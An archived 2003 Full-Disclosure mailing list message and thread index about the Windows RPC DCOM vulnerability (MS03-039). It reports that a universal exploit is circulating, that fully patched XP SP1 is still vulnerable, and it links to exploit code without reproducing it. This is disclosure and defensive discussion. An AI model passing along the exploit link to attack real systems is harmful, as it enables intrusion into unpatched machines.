Bobby -----Original Message----- From: Alex [mailto:pk95 () yandex ru] Sent: Friday, October 10, 2003 1:09 PM To: bugtraq () securityfocus com; full-disclosure () lists netsys com; NTBUGTRAQ () LISTSERV NTBUGTRAQ COM Cc: Secure () microsoft com Subject: [Full-disclosure] Re: Bad news on RPC DCOM vulnerability Exploit code can be found here: http://www.securitylab.ru/40754.html This code work with all security fixes. It's very dangerous. ----- Original Message ----- From: "3APA3A" <3APA3A () SECURITY NNOV RU> To: <bugtraq () securityfocus com>; <full-disclosure () lists netsys com>; <NTBUGTRAQ () LISTSERV NTBUGTRAQ COM> Cc: <Secure () microsoft com> Sent: Friday, October 10, 2003 6:48 PM Subject: Bad news on RPC DCOM vulnerabilityDear bugtraq () securityfocus com, There are few bad news on RPC DCOM vulnerability: 1. Universal exploit for MS03-039 exists in-the-wild, PINK FLOYD is again actual. 2. It was reported by exploit author (and confirmed), Windows XP SP1 with all security fixes installed still vulnerable to variant of the same bug. Windows 2000/2003 was not tested. For a while only DoS exploit exists, but code execution is probably possible. Technical details are sent to Microsoft, waiting for confirmation. Dear ISPs. Please instruct you customers to use personal fireWALL in Windows XP. -- http://www.security.nnov.ru /\_/\ { , . } |\ +--oQQo->{ ^ }<-----+ \ | ZARAZA U 3APA3A } +-------------o66o--+ / |/ You know my name - look up my number (The Beatles)_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html This message (including any attachments) contains confidential information intended for a specific individual and purpose, and is protected by law. If you are not the intended recipient, you should delete this message. Any disclosure, copying, or distribution of this message, or the taking of any action based on it, is strictly prohibited. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- RE: Re: Bad news on RPC DCOM vulnerability, (continued)
- RE: Re: Bad news on RPC DCOM vulnerability V.O. (Oct 10)
- RE: Re: Bad news on RPC DCOM vulnerability Byron Copeland (Oct 10)
- Re: Re: Bad news on RPC DCOM vulnerability petard (Oct 10)
- Re: Bad news on RPC DCOM2 vulnerability Peter King (Oct 11)
- AW: Bad news on RPC DCOM2 vulnerability Florian Keller (Oct 11)
- Re: Bad news on RPC DCOM2 vulnerability Alex (Oct 11)
- AW: Bad news on RPC DCOM2 vulnerability Florian Keller (Oct 11)
- Re: Bad news on RPC DCOM2 vulnerability Valdis . Kletnieks (Oct 11)
- Re: Re: Bad news on RPC DCOM vulnerability V.O. (Oct 10)
- Re: RE: Re: Bad news on RPC DCOM vulnerability Paul Tinsley (Oct 12)
- RE: RE: Re: Bad news on RPC DCOM vulnerability Mike Gordon (Oct 12)
- Re: RE: Re: Bad news on RPC DCOM vulnerability Alex (Oct 12)
- RE: RE: Re: Bad news on RPC DCOM vulnerability Brett Moore (Oct 14)